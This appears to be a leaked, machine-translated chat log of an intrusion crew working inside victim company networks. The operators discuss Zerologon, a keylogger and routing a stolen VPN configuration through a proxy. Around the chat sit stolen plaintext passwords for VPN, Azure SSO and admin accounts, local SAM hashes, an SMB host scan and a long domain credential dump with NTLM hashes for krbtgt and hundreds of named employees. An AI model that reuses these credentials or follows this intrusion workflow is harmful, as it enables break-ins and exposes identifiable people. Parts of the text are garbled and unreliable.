``Password 5015T1ce ``opaaaah'' GPJHelp:1001:aad3b435b51404eeaad3b435b51404ee:6f2e383aaec00617d60f8a23e7fed5e2::: `````` Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: GPJHelp:1001:aad3b435b51404eeaad3b435b51404ee:6f2e383aaec00617d60f8a23e7fed5e2::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7f1bb527f5d3c495c3b53a4754d38ede::: ``timelysession come fly the session from here eishenu zerologon breaks dk yes, so you have to be careful here dka, that's what I meant) thank you)іGood morning maybe zerologon?mb not tehmozhet fit something like that from mylearning GSI there keylogger caught some password from Lisa ran through the configuration of the Lisa with Richard's creeds - the same everything, should connect and said that the error unknownhodu creeds not the best guides such always pick upa there among the obvious points could be an item with a solution to the problem) but there at the level of start the client enter login enter password there's no problem with it, just press okeyv sitbelt by richard so there's no codewhen this richard's machine isn't working right nowfind some dude's docs on iphone startup, maybe there's no help here either. Wed Oct 21 21:02:54 2020 OpenVPN 2.4.7 x86_64-w64-mingw32 [SSL (OpenSSL)] [LZO] [LZ4] [PKCS11] [AEAD] built on Apr 25 2019 Wed Oct 21 21:02:54 2020 Windows version 6.2 (Windows 8 or greater) 64bit Wed Oct 21 21:02:54 2020 library versions: OpenSSL 1.1.0j 20 Nov 2018, LZO 2.10 Wed Oct 21 21:02:54 2020 MANAGEMENT: TCP Socket listening on [AF_INET]127.0.0.1:25342 Wed Oct 21 21:02:54 2020 Need hold release from management interface, waiting... 
Wed Oct 21 21:02:55:55 2020 MANAGEMENT: Client connected from [AF_INET]127.0.0.1:25342 Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'state on' Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'log all on' Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'echo all on' Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'bytecount 5' Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'hold off' Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'hold release' Wed Oct 21 21:02:56 2020 MANAGEMENT: CMD 'username "Auth" "richards"' Wed Oct 21 21:02:56 2020 MANAGEMENT: CMD 'password [...]' Wed Oct 21 21:02:56 2020 MANAGEMENT: >STATE:1603306976,RESOLVE,,,,,, Wed Oct 21 21:02:56 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]50.202.106.2:9443 Wed Oct 21 21:02:56 2020 Socket Buffers: R=[65536->65536] S=[65536->65536] Wed Oct 21 21:02:56 2020 Attempting to establish TCP connection with [AF_INET]50.202.106.2:9443 [nonblock] Wed Oct 21 21:02:56 2020 MANAGEMENT: >STATE:1603306976,TCP_CONNECT,,,,,, Wed Oct 21 21:04:56 2020 TCP: connect to [AF_INET]50.202.106.2:9443 failed: Unknown error ``Dasox definitely off? waiting and again on tcp_connect thought chetokevsena and vpnts as if meant as not in the network it is external so you specify in vpn the address of their vpn server there are attacks to chase, i am not in their network why? it is in the open vpn proxy i pointed out not yours? Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'proxy SOCKS 104.243.40.126 1337' ``Yes''. Wed Oct 21 20:58:32 2020 MANAGEMENT: >STATE:1603306712,TCP_CONNECT,,,,,, Wed Oct 21 21:00:32 2020 TCP: connect to [AF_INET]104.243.40.126:1337 failed: Unknown error Is it responding? I'm working in it as it should be? Does it work? What do you mean? Did it stop on tcp_connect, did it crash? 
It's going well so far with no errors Wed Oct 21 Oct 20:58:29 2020 OpenVPN 2.4.7 x86_64-w64-mingw32 [SSL (OpenSSL)] [LZO] [LZ4] [PKCS11] [AEAD] built on Apr 25 2019 Wed Oct 21 20:58:29 2020 Windows version 6.2 (Windows 8 or greater) 64bit Wed Oct 21 20:58:29 2020 library versions: OpenSSL 1.1.0j 20 Nov 2018, LZO 2.10 Wed Oct 21 20:58:29 29 2020 MANAGEMENT: TCP Socket listening on [AF_INET]127.0.0.1:25342 Wed Oct 21 20:58:29 29 2020 Need hold release from management interface, waiting... Wed Oct 21 20:58:29:29 2020 MANAGEMENT: Client connected from [AF_INET]127.0.0.1:25342 Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'state on' Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'log all on' Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'echo all on' Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'bytecount 5' Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'hold off' Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'hold release' Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'username "Auth" "richards"' Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'password [...]' Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'proxy SOCKS 104.243.40.126 1337' Wed Oct 21 20:58:32 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]104.243.40.126:1337 Wed Oct 21 20:58:32 2020 Socket Buffers: R=[65536->65536] S=[65536->65536] Wed Oct 21 20:58:32 2020 Attempting to establish TCP connection with [AF_INET]104.243.40.126:1337 [nonblock] Wed Oct 21 20:58:32 2020 MANAGEMENT: >STATE:1603306712,TCP_CONNECT,,,,,, and then start the VPN and then close the proxyfair close the ovpntac is holding the thread in the proxyfair process why it's still hanging restart the ovpn client stop I started without proxyfair just exactly disconnected the socket? 
yes ?sox_rukkotryaskanu here above whats the same error without proxy I ran it) with the same proxy and today I ran open a proxy in open aopn and forgot about it yesterday so I pointed proxy from cobalt in open aopn and threw the config from open aopn? Wed Oct 21 20:50:52 2020 socks_handshake: TCP port read timeout expired ``Handsome guy, now there's a new problem with those craps. Target : autologon.microsoftazuread-sso.com UserName : richards@continuant.com Password : MyW0rdPassW0rd! CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 2/24/2020 11:30:58 AM Now it just asks for Credits. It's ok, I thought I should change my -name to something of my own. In cryptography, X.509 is a standard defining the format of public key certificates. X.509 certificates are used in many Internet protocols, including TLS/SSL, which is the basis for HTTPS, the secure protocol for browsing the web. They are also used in offline applications, like electronic signature ``What is verify-x509? Well, commas are used instead of slashes in config anyway. I've edited my config.ovpn file. There is a line like the following tls-remote "/C=Country/L=City/O=Company/CN=Name/emailAddress=email address" You have to replace the line with the following line verify-x509-name "C=Country, L=City, O=Company, CN=Name, emailAddress=email-address" ``try'' https://community.sophos.com/utm-firewall/f/network-protection-firewall-nat-qos-ips/93118/openvpn-tls-remote-deprecated-yet-used ``log: ``` Options error: Unrecognized option or missing or extra parameter(s) in lisa.ponsler@fife-utm.continuant.com.ovpn:6: tls-remote (2.4.7) Use --help for more information. ``said that everything is fucked up, look at the logs, what is tls-remote to it which one? 
I've tried it with all the codes that I threw above - error on the screenshot Attention pausestartt her creeds in the search string indicated mail ithelpdesk ``` tls-remote "C=us, L=Fife, O=Continuant, Inc, CN=FIFE-UTM.continuant.com, emailAddress=ithelpdesk@continuant.com" ``when deleting a string from the config asks for cresno with the existing configs it swears at the string is here open vpn through the eye of Sauron and hands search configs - empty while they do not see configs instead enikonnect - cisco ip communicator should be in the prog files x86 - cisco - enikonnect asks for cres when connecting? just tried domain without specifying the domain? there are sessions on 3 machines richard lisa andrew lisa is alive and it only has OpenVPN, it has configurations, but no cres info on anyconnect should be at richard, still dead andrew barely got to touch it yesterday and it died a cowardly deserter's death SSL VPN IP address Https://207.225.113.146 Username/password dadmin/w3r3g00d ``` ``` SSL VPN (anyconnect) IP address : http:\\66.236.103.194 VPN clinet IP Range : 192.168.1.230-39 VPN username : vpnuser VPN user password : h4rdt0gu3ss ``` ``` SSL VPN Address Https://173.12.52.229 System administrator Usrname/password dadmin/w3r3g00d SSl VPN user midawivpn/m1daw1vpn ``Yeah searched for rdp/vnc? no found vg logins? not saved probably not think``` --- FireFox Credential (User: administrator.MISSME) --- Hostname: http://192.168.1.10 Username: admin Password: ``` Is it possible that password is blank? 
192.168.1.229:445 (platform: 500 version: 4.9 name: MFPB07F48 domain: WORKGROUP) 192.168.1.233:445 (platform: 500 version: 4.9 name: MFPAB870E domain: WORKGROUP) 192.168.1.237:445 (platform: 500 version: 4.9 name: MFPB37AD8 domain: WORKGROUP) 192.168.1.243:445 (platform: 500 version: 4.9 name: CANONC5035 domain: WORKGROUP) 192.168.1.247:445 (platform: 500 version: 4.9 name: SERVER-819751 domain: WORKGROUP) 192.168.1.252:445 (platform: 500 version: 4.9 name: MFPB43E92 domain: WORKGROUP) 192.168.1.253:445 (platform: 500 version: 4.9 name: MFPB316DC domain: WORKGROUP) 192.168.1.140:445 (platform: 500 version: 4.9 name: TIMEMACHINEBKUP domain: WORKGROUP) 192.168.1.155:445 (platform: 500 version: 4.9 name: MFP07330011 domain: WORKGROUP) 192.168.1.120:445 (platform: 500 version: 4.9 name: SERVER-T1 domain: WORKGROUP) 192.168.1.60:445 (platform: 500 version: 6.1 name: EMAILBACKUPS domain: WORKGROUP) 192.168.1.10:445 (platform: 500 version: 6.1 name: MM-VAULT-NEW domain: WORKGROUP) 192.168.1.222:445 (platform: 500 version: 6.1 name: MFPB4FDF5 domain: WORKGROUP) ``Poorly old (what I found) okay, it's a swamp poppy time will not be wasted break what you can reach and fuck it usually on the AFP (can't do anything about it if the 445 is not available FShuevod, there's a lot of them, and also the admin computers on them ahono on the AFP can be without smb (this is appleplotaymashinah fuck```) TIMEMACHINEBACKUP domain: WORKGROUP EMAILBACKUPS domain: WORKGROUP for example they are behind the domain, it's not clear how they go there also admins can go there through clients and not browsers if you looked at the hosts it's outside the domain remember how you defined it? 
but i'll check i don't think it's even here i found backups, but in the center no backups virtualization system priority anyway this shit isn't right ``` Serial Number: W8KMJ24BNHCR6CM Website Link: https://home.mcafee.com/secure/protected/login.aspx?rfhs=1 Login: thomas@aktn.com PW: $Mcafee1234# ``You can get ready, I'm going to find the password for the ABDA, I threw it so I wouldn't lose it, I'm going to shut it down, what do we have here? Ask a colleague how to do it, ask a colleague how to do it, I'll give you a dll, pick a quieter and more remote server, thanks, you're welcome.`` [DC] 'MissMe.local' will be the domain [DC] 'MM-DC3.MissMe.local' will be the DC server [DC] Exporting domain 'MissMe.local' 502 krbtgt e7a33c4e6c4edc222481d99080ec3c08 514 4146 ELO-AE962551BC7$ 81639909f862f53089210fd95b8632eb 4096 2735 THOMAS-THINK$ 75b626032ebcada49315e028045d5879 4096 4135 ROYKOWN-THINK$ c7d508cda2e5903a4a6d5eca1102c500 4096 4152 IBM4-THINK$ 590ef9ae405c55f6590c56b962b5f439 4096 3716 ELD$ a290db25d845ecc3843ab2cc9c82f16e 4096 4145 THOMAS-HP-WORK$ 62d192174bd613b81f92b49d5e8235be 4096 2305 LASW01$ c23d996b31e6afd862214c7f54cf70 4096 1554 MISSME-F7082DDB$ 3b42fe51b694f829f865bbd7114fc143 4096 3638 HP20181167898$ d69f6b7c436ee14007b6fb5454f84cec 4096 4161 ROYKWON-HP$ 88f0acaf77f17e498dbb0076f7b664c5 4096 3690 AIMS-SVR$ 370a577c38663b023d5947e8018fc930 4096 4178 TM06_YORANDAGOM$ 54a09a85d93611b9b4eb2db588957584 4096 4182 STELLA-HOME$ 8c44fd32a091a5cd0e204bf1feeb5f4d 4096 4185 MEK-ACCT1VM$ 0b9fd6996556cc1f1ee2be2658b0c4bf 4096 4192 MEK-ACCT2VM$ 0897b83a3b3b31ba2f1fe2a869bce569 4096 4141 LASHOWROOM05$ 85a3d5a3eeacc605489ab043dfd8ae49 4096 2645 HQTMP08$ 4f093e3548a0b26ad70cf2affb99839a 4096 1610 MOD2User 2271cf353a840dfe25bb8fd2fe773cad 512 2730 HQTMP12$ ea8680c0181c316b270336b10a2103e2 4096 2642 HQTMP07$ 2296e463b7a2175bd36d573d12db7731 4096 2110 NYPC05$ b7c6bfa69a521a05ef19f985e14e8de8 4096 4227 HP196$ 6e5819beb5b7344cbdbb4d64789ab496 4096 2107 NYPC02$ 
81f2b35b4335b519a50f9460a2648829 4096 2106 NYPC01$ cb2cfd14a2e22c6e28e98565c18d451e 4096 1138 JasonTak 20efb41d34a235754a4c9bb1bb15e7fe 66048 2043 SVAULT-SVR$ 648c9dae88921ee8ea18261daa0eb1d7 69632 5617 itmac$ c413964d5509a1457207eede89cf98b7 4096 4226 MMNY002$ 30969d0e639fe3cd4dd9bec921bcc5a6 4096 2626 HQTMP06$ 2e9cb30e176a3e638134bcda39f7dd59 4096 5624 hqmac015$ bf11ebbb7eee4c2f4fb71a6f9132c189 4096 3822 LASHOW03$ 3649c1d621939577c103c348fd7848b1 4096 3792 HQTMP04$ d9135a22a01082800e6c653c775a65b0 4096 4165 THOMAS-WORK-HP$ 0a571eeefc5f0e911477bd21ced146c3 4096 3814 TrentMaclean 32a861404177c2292b02d41a1ffd05fd 66050 5675 MEKMAIL-HP$ 57836ec1d7e243b5eaaf5c73b7338d6a 4096 5660 hqmac025$ b437f7f303714c9a910edfdbc7090f7c 4096 2702 HQTMP10$ 0fe96168d14f72e1aef67d86b0f31c3f 4096 4225 MMNY001$ 2843485c3817c7487534860c7bed0a2e 4096 3890 MMNY003$ cf7695d32c74c69772f09c825a07daea 4096 6119 joekim$ 865101b12e6702e23eb310255a1c7240 4096 4248 hqmac006$ ce9c7374d99168b69b71662f14f70bca 4096 5622 hqmac003$ 5654afcf073f3a72dda061fa70b49f8c 4096 6124 mek-mac01s-imac$ 97bf33692fb6720ce963b6462b55b24b 4096 5625 osxserver$ 3a2b06b5e4ed40693850b92f5b893452 4096 3924 hqmac016$ e1a7503caa1f6336aea07013bb0e2eeb 4096 6138 hqmac029s-mac$ 68bbda7d561942775d518d3cd9e5bf05 4096 3931 hqmac021$ 75b474ac45326761661ddefd88e2ca11 4096 6145 hqmac037$ 10659f2bece677b186aab29cc2814cba 4096 3802 LASHOW05$ 0f5a535d5c1603c022a2bb2804f2324f 4096 6140 hqmac030$ 8a7eb7d5e9a8337f389480061387f5a6 4096 3919 hqmac004$ 440de876a486b74a77f1891826c38b23 4096 6153 hqmac038$ d0941c78d5780d989b682a7efea6ab62 4096 4256 hqmac019$ 4851ea5d113e4eb17e79aac3c4330661 4096 3821 LASHOW02$ d199c6c8033e050d7aefd62b0d857552 4096 2736 LASHOW01$ f8f60bafc0496f5e30e5650adec96f12 4096 4224 LASHOW06$ 60e7daef67d101d5d38324d0b947c809 4096 3823 LASHOW04$ 97f8d9f46fc5a59f0ef703d8b1510e8b 4096 5723 SURFACERENTAL01$ b297cf14bdc1617d7993cc3003c7d9ca 4096 6128 HQT006$ 232ed08a47070f7ba9a38a5dc809b55a 4096 6117 hqmac027$ 
85d54781b00a8f818b743e3ab932f660 4096 5676 THOMAS-HP$ c1fab19aac8fcf33d0f152f3b4551371 4096 1155 RoyKwon edde0a2302794d0af770ed7d15081005 66050 1176 SteveKim b841b54f0c6238dd30cd66fa2c1eee0f 66050 3628 NatalieN f2b77c7548eea308677a1357baa052bd 66050 6125 HQT003$ 9fde2eeb2c90a687c7ff2062ac68078c 4096 6113 it-macs-imac$ 5bf5f78f0da435f2d59be213633109c6 4096 6160 hqmac041$ d71ad5ab65c7b34c77f226e0cf0d4457 4096 4170 HQ121$ dea99309f148e950bd15700fb4f63354 4096 1397 YoungCho 2a811a6e4b55f7c19d146b73fd1dfe60 66048 4252 hqmac008$ a2cfb8f09cdb0f8c677236b823e163ec 4096 1145 EricChoi d1eec596185e0f634bab3761f5a86da8 66048 1162 MayHan 8f18cabbe2b0f33343ad4f35bb25f0a7 66050 3840 SunHeeLeem 53497e9ecf73893ab53e27ba682b20a5 66050 5639 Julikyun 84079b3db4b1e965a05f8aa7e1a90747 66050 3658 DaniWhang 06adc46626eb166163cd0f9c261bdcd8 66050 3665 DooyoungKim 4c1a588d4c19b174e32ae5e9c4d40577 66050 5629 CarolineLee e429408c826ffbeb486c4f66341438a6 66050 5771 MM-BOOK-17$ 34874ee6462fcea732311d3b371c54674 4096 3921 hqmac010$ 4473f0748637f3472e51d264becf27fa 4096 5644 hqmac022$ a945b5645541f6c15a03c19d9b26e3d0 4096 6187 KPNWH009$ b91cc44029ab92916ea5b2be1f03ae0e 4096 6188 KPNWH010$ 4f636d219b77e3ce032f917cc3f6927c 4096 2732 HQ054$ 3aafc4fc1c5896b69b49a0affe9e0efd 4096 4202 HQ163$ 0de0b6eac037cd47da8e40b192d3b346 4096 3855 HQ167$ d3dabad07fd4fc143eda83af97ce21fd 4096 4206 HQ170$ 493a52694f33d857d444662468750094 4096 4207 HQ171$ 6abcceddf37897ee28505913460206ca 4096 4209 HQ173$ a530d47426ce2d28f50880533921a8e0 4096 3863 HQ175$ cc32bb327c31d38e4690863bcf72ec36 4096 4217 HQ185$ f1fc9879ee531e25f813e63ba3385575 4096 4258 HQ224$ 0f29fc0252f5f99c40eec50712a2e2eb 4096 5613 HQ213$ 03462bba4de1e66757656fc33ed62424 4096 4233 HQ204$ ec89df2639eda50ff9f7027b0595d865 4096 4230 HQ199$ 0836a33445851bcdc0378505403f72fc 4096 5681 HQ239$ 86a324202574d4d1d52088e317081271 4096 4223 HQ193$ e844c8b07b6bb2b66dbdce4792990825 4096 6146 HQ267$ b7521c6f10d9140011662761cfbfaa92 4098 5721 HQ263$ 
e1736bc430290de94c38d62322dc3731 4098 4253 HQ218$ ba1b9aad47589af0bed56e4c42ecec00 4098 3930 HQ225$ 1e8bfef00b16c4eb18337dfc1ffd4691 4098 5670 HQ234$ be438598d72404076e05b3154d75f814f4 4098 3925 HQ219$ f37b649994994912fde728f9bb33b195a19 4098 6126 HQ243$ ad3d9d8d0e33652f8f8a7a49a4946a22 4098 6152 HQ271$ b2572bbcb601aad27763ad53755b4c7c 4098 6163 HQ281$ 502249f258905f755079a6e954c6beb9 4098 6166 HQ285$ 69121ca579a75b76238ab16b9b6d5a8f 4098 6168 HQ291$ 59963e0afd783fafdf7228c94beda85b 4098 4159 HQ107WORK$ f7501144a4eb8cb65d647161c2786d90 4096 5798 MCTEST b58b38a0038bfa92d22a5d8d06c51f45 66048 5673 HQ238$ 3e74a9ce0dc572a227c3eff34a093a21 4096 5728 HQT009$ 454dfbce440c92e162c9b49df65a0fed 4096 4197 HQ156$ f3b66b6a7729b159e99632095652ae8a 4096 5722 HQT008$ d345fb1b81290ab918df4f48753cba9f 4096 1974 DemoUser 95197f192c3878bd20d92d19a1e06d14 66050 5754 HQ286$ 4d72e65e9a02a9932a3ec49c5da21e59 4096 6189 KPNWH011$ 0fb8b8c233f5638348d590da0240748c 4096 5807 YolandaGomez 09b24c3afe78be3d47d2a44953d3ca20 66050 5802 SoniaChen b78b06f140877bd735115e18eda0c522 66050 5804 JamesYoo 6531d27c4430bd65fe56640647ff41f6 66050 5803 KayleeSeong 515dcbd556ef06fc3d75ac2c49af394e 66050 5806 KennethKim 788d511092eab1b20b5d3e492267cd33 66050 5738 HQ277$ 8b249236f26194c46fe218b9b1603615 4096 5878 hqmac057$ b6918631d07ab98a8dcccb263747933c 4096 4168 HQ119$ 77ee5d2a712e4c88122eead4538fe976 4096 4181 HQ137$ e2330552c16213b62717e4f679535cce 4096 6182 hqmac001$ 4f967b21fd2348237a5e89db0ffb9dd4 4096 6149 BARTENDER1$ b3c5ed5fb9f2c9b1dafdf4b3d9f601f5 4096 5849 HQ309$ 66fbbf666b0fa452e77e89efa038b0d4 4096 6191 hqmac047$ 0d94f798c257a5f957c6c850dfe9f4ca 4096 5717 HQ260$ d00a4dfb9f0051471eddb07a04f79419 4096 3891 HQ194$ 9326303b9291d7185e50ac32e94f0b8b 4096 6115 hqmac026$ 6fb614c51682ccaff204f71e6b8ba61f 4096 3920 hqmac012$ 9c440385810cc3f1405a50455d2c9ed4 4096 4200 HQ161$ d5e51307755a499a223bec575648b966 4096 5833 KPNWH002$ dbd21897d282b5be82892c4233554937 4096 4218 HQ186$ 04708bbc4fad81334587636b7732bc47 
4096 5881 KPNWH005$ ad368370e8d93c7b8352c511ffd5cd4f 4096 5749 HQ283$ bb8fae1c35517e61bfe7794c3a24c94f 4096 6193 hqmac051$ 69fc114100945750b5a4b2255e7d1f08 4096 6172 HQ295$ 58e8b9be412b4edd547bc1e81bc43930 4096 5900 JennyKim bacf032fa0507f214011a998419c8a24 66050 4157 HQ103$ fd83429a7e16b9e00c881c47a57e0570 4096 5732 RubenAjanel 4b60ff7da6911175b03d52ebbad61ea1 66048 3798 Aditiya ff2206f7cce075f4b94c240f84fa87b5 66050 5700 AllisonHatley 28e329b7b2e6440e0442d30018887ec1 66050 5780 AndymKim 8af86b862e4b3e5b282cd728eca955e9 66050 3770 BenjaminYoo c87f1395d52d498509ad9a81cbeb66c9 66050 1194 CarmenBautista 20f823a52f52886c24ff17ec24863c70 66050 3738 CaseyYoon a2743599d8de5c04ae19c8d5b06e00d4 66050 5887 CrystalHa 4e30d11b09201b1d2a4e3ffec8ec1356 66050 5779 DarenaYee 15d6b89b012240193b0f864bfd557dc6 66050 5626 DarinUnke d6d82f080ad59b30184f48b7319e9c7c 66050 3752 DianeLee 8524f0ddda8ad90716cbec4a43eabfa5 66050 5861 edwardvillaflor 6991452b1e1109cec321597551c5aa46 66050 1469 HannahLee 5fe5b315023fc58559ced8c62193d721 66050 5891 HannaRoe 109026de4d387bab6788f1e3fa947329 66050 3722 IvanFranco 0644b58b4e4cebb1eb7948640188386b 66050 3903 JamieChu 10f2774f0fee32179fb5c72d18d90f27 66050 1182 JasonYi cc6e7ed41bee7252216c5e00177c6dce 66050 3796 JenniferKo cf82c20d8b916740536f231bf89176e4 66050 5862 JenniferLu 055b2f2830ac22e3adbdd0aba8032a6a 66050 5845 JoyJo 8a386750cb7f79b293e74c7dcbb985f0 66050 2051 KirstenLee 2ca7f19c77b6dba33d03c9ea83ce77ee 66050 5813 KPNWH f2881c89b8d79e078cc6fe323cd1f5c6 66050 3851 KyeongKim 6b1d99b1a8f8787495034147364ad8af 66050 5882 MarianaFe 97746f1f22b7626f4b39a150f1237cd7 66050 5825 MollyPoer 10a62127dbbf80ecca2bbd326c7afd4d 66050 5814 PriscillaW 53bf2d1072aeabe7bacd02f5dbf0242b 66050 5884 RachelleRoh a9c592e5bfed559620db2747fe12e0df 66050 3804 SarahBrown dadc931ee4418fe09290f5fcfa7a31e6 66050 2274 SherryRobinson 2504f4ed1bef329ad1a82be522ef9d8b 66050 5778 TammyLee 2579ab1f944482c42e3bfa86025b3781 66050 5810 TerryJung 3893cfeb41316e3236fc24e6b19a7b88 
66050 3893 TysonRoberts 5c85c652cbe3a5d07e5cceee06ff648f 66048 5704 hqmac029s-mac-p$ cb9c71b8a8ca5dadc08a67bd48a44ddb 4096 5839 CaseyKim c86a193b217c2bb3e2a709cd3eed8bef 66048 6214 hqmac055$ 14d988005fffc670ecaa4bc2155a7819 4096 5916 EileenAhn 4fdc363f603e2da46f2dac25e0452dfb 66048 6144 hqmac036$ aba4d8780a601a8d96018bd83bfbc3 4096 5724 AnaLerner fd74c2d41744ec69627ccda78c24045d 66048 5906 LaurenYi e302fcdf9cfa1aa396911b17af72b7c5 66048 1170 HyeRChung 26f9e6b2b0a2f3cdd26c6c82f3576b1f 66048 5706 HQ252$ cebe173dab5366f8f5e5e7734c6a2485 4096 5645 hqmac023$ 92885ccdc650bfe1a1c8cf8be3688553 4096 5838 hqmaq049$ 2b2e8eb7de8c32f5cedd5ce611ef64 4096 5856 SoohyeonJu 87147bb3f58ac1f730a82e1e80704202 66048 5855 KristineLee 5769997bc24d4d0b6c3f3d2a24ed99ed 66050 3869 AimielCruz bc1d46b20def74cd03e9fc377c23860c 66050 5705 GigiMo bf7b867d02f4643d4de0fa236e2b5aba 66050 3831 EricYoo 092ab18778a5b24107764b2935fb84f1 66050 5877 AmyChrest 13d7af5dadffbf56b1ba688e9ade9c6fd 66050 3843 SherryKim 206f576f7f34d314c59c3c79c880098a 66050 3850 RobynEden fe3e34132f1820532c8454a114d3c237 66050 5876 BrisaFrench 02a756cbbc986e925720f5f0abfc49ac 66050 5746 AyumiS 5f693a08dcaabaacab2a9941178edc8c 66050 5846 BerryRoe f4c7746bcf5217b446b4b24cbc7cb9f8 66048 5708 RochelleC a4f4550e65082f42dc43557b05fef714 66048 5685 KatrinaLam 6ebb1ee9dfcf841c74f08efb91288a44 66050 5867 MaySeo 3c1fb10039c8249583ee285277ea7149 66048 5761 SaraLin b202b49eeb32b6d32a70c9d404c07758 66050 5646 IanWilliams 51b684079799f9b9cf97ec0628a129ab 66050 5621 MKIM cc58f2d3ab17b7510bc2c69738be2a62 66050 5653 ChristineWang 7de678c6e3d53bb203b3f616d4ac3469 66050 3880 DannyKim c45e98e65a5308ad802d17b47b21b5b4 66050 3884 ArmidaTenorio 6abd12f3155f8c8dc88e7952f4bdf767 66050 5707 CynthiaCeballos 84ea8f5bfdbb81e08ac23a4c090e399d 66048 5631 BrookeLamb ea8ed05bba630cb348831db253c9f533 66050 5618 DianeJoo 107831efd32c15e9055a67328be8178 66050 5823 JulietKim 899c8f6cc0acd27da61e1de00a572d06 66050 5691 ColbyCochran 752b0dd44fc8ad88f029ee634b22ec11 
66050 5851 JulieAhn 0c35bd92e8e949d72b87dfdbf7b91f34 66050 5665 CynthiaLe bd4e7e36fee6058d3da5dc94e726d354 66050 5847 JiJiPark 4c8e2ef2ec82cdd48c87ea7c9dba6578c 66050 4243 MichelleKim dd42d76c4f23ce1568269e50ef19f99c 66050 5769 CandiMendoza f3eb87ad697f1255ac8f8828cf32010b 66050 3894 EstherYang 0cc102edc0751a912c7357fea84b723f 66050 5864 RianneLee 4a2e10be4cfe8b16ee4f1203a9fd50b0 66050 5619 DonabelDacumos eebad80e60bdf026b3e22825f75ffad1 66050 5873 MoisesRivera ba498a5d108d652a0b28ccbd8fa433ac 66048 5763 AdrianaNajera 64adf3f2840e0e97c24052fa3fd69b54 66048 5692 PabloJuan 476ef9d2552e0b988193c7606dbf3321 66050 5874 SoniaAlcantar 159387d789654c9d86afbe5534a9b8d6 66050 5840 AsukaInoshita b33874cc598428c5355de75899330406 66050 5777 AmberTrillo a55b47cf346cb8180c94beb022768970 66050 5666 LauraChun 84e26f7fefcf961d06ded608d2d0cdde 66050 5901 HannaKim c8b8252b646fd217fec981b459c8d1fd 66048 3867 StacyChong 2af8c710f387152783e3dddbcd9919f8 66050 5826 CorinaLopez cdd757a09c8a94c9e9afc4a4d0d8f86a 66050 5879 OliviaSon 7b399e87e116d447a0474e6b8e3f90b2 66050 5772 MarimoNakamura aa564997d2ec6a562f43d23d61da8f72 66050 5737 KellyKrapf d6084685870c70d38bcc7cb808c5eb55 66050 5765 LisaCano 343e018ee7d036929deecd17e6eb9201 66050 3861 KathyBuri c3aab25918933f4c31588482ca1ce8da8 66050 5751 TeddyLee 8b5ef5b285944b140367c759a70b12b5 66050 3833 JPAntonio 3eda63fd4bf28ba37b061fff4f3ea25b 66050 5768 MichelleHughes 7a353222568c31750ddf263dcb60717f 66050 5801 EuniceSung 0771d3292bdb8226956709118b758f2e 66048 5844 BrittanyLee 0ebffbba2bfe6fc460bf1cd574a4f44f 66048 5635 hqmac020$ 2c62f2e09f34d1c08952df71c50ae552 4096 5693 hqmac024$ 3a6e6e39d531690a3f119c75c552968a 4096 5917 HyeMinLee 7b6fe95a8f84ed4cf4d32ad70fbb4587 66048 5854 HollyHong c61d6b3f77c2b4855812fcd8630ef5fd 66048 3653 YoungPark 6e0e7aa9c00527b0fa1bbd6d0cd98fd0 66048 6194 HQ310$ a71e5bdfaf4a80d93bdd3386a022de3e 4096 5834 KPNWH008$ a5d299ff2966dc2d5a0d56a0bb2c383d 4096 5726 HQ264$ 9d7dd5edd4a8efeb03c2e23aad43b63a 4096 6150 HQ269$ 
656216e0054218e902a474bd7155e285 4096 4174 HQ127$ 03a49b6dccbc1dd7ebbc700839c99e9eb 4096 5905 KaylaShin 4ded1802b3eb1aa7a4b9a6377fc321b5 66048 3763 EstherPark 4e007b54f6c36065e3201ecbe986209e 66050 5836 KPNWH022$ 050351e2cb1c757ee2656de8a9429628 4096 3740 YahneseGriffin ec3f0f20a6578b3baeffac643e00887d 66048 5902 BrittanyB fcbced07ee40a75906c5094bbd415df3 66048 5770 StephanieRamos c48ae90c892a82790b9ba984cfc9f42cb 66048 5843 hqmac052$ 597409290b7cdf031a0959eb6c7047b5 4096 5835 KPNWH016$ 99bcedb53bba0948956aa3c15fbf5854 4096 6192 kpnmac011$ e9aee4bd19cac93d723d107c2491c1c8 4096 5890 GanieHwang 90d282fdbd1ffb7c7ba07e48a967cee4 66048 5668 BrayanSerafin 49ebbb91c81babc7089316a0bfd81133 66048 4228 HQ196$ 3b0acb49688c0d4c19b9e55a1328534c 4096 5775 HQ304$ 132f8612e7c095e040596956e01e4855 4096 6178 HQT012$ 084dfdfc51e8403d969b68ab2972b983 4096 5829 KPNSR002$ ca8cbe530b218315e155ff8e76d4c6f3 4096 3904 HQ203$ 7a88c957bc45cbccfb354bcdd1450aae 4096 3655 LillyKim 423b5d1ef30cd08e4ba545c79adc9323 66048 3927 hqmac014$ e1a5e73161369fec7e5e1408bf295803 4096 5869 ChloeLee 8637cea980695ea8d5c8ac3f5e1da29d 66048 6127 HQT005$ 58a459f3f55527d0532245998d1a9652 4096 3764 JanetteFlores 1af2e1956d0c6405d27912e7d8def701 66048 5907 JinYoungKim ba3dfb7e94110778ee0dccc2546423af 66048 5875 AliciaHwang 48bb75a2109064b5f558eedbef042f1a 66048 6171 HQ294$ f1318b15a580a08df95b7bb4fde038c3 4096 3832 HQ158$ 5967271268cbedf66eb4cacf7ed527f9 4096 5742 